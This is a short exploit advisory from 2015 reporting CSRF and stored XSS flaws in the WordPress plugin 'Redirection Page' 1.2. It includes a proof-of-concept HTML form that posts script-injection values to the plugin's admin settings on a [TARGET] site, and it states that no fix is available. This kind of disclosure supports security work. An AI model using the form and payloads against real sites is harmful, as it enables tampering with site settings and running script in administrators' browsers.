Home / exploits WordPress Redirection Page 1.2 CSRF / XSS
Posted on 10 February 2015
Title: WordPress 'Redirection Page' CSRF/XSS Version: 1.2 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2015-01-26 Download: https://wordpress.org/plugins/redirection-page/ Contacted WordPress: 2015-01-26 ========================================================== ## Plugin description: ========================================================== Redirect your specified pages, it is usefull when you have 404/not-found pages. Go to Settings Page to start redirection. ## CSRF: ========================================================== It is possible to change the plugins redirect settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ========================================================== Redirect settings from the admin page is stored and shown unsanitized on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and submit this form: <form method="POST" action="http://[TARGET]/wp-admin/options-general.php?page=redirection-page&redirectionpage_action=add"> <input type="text" name="source" value=""><script>alert(1);</script>"><br /> <input type="text" name="redir" value=""><script>alert(2);</script>"><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available.
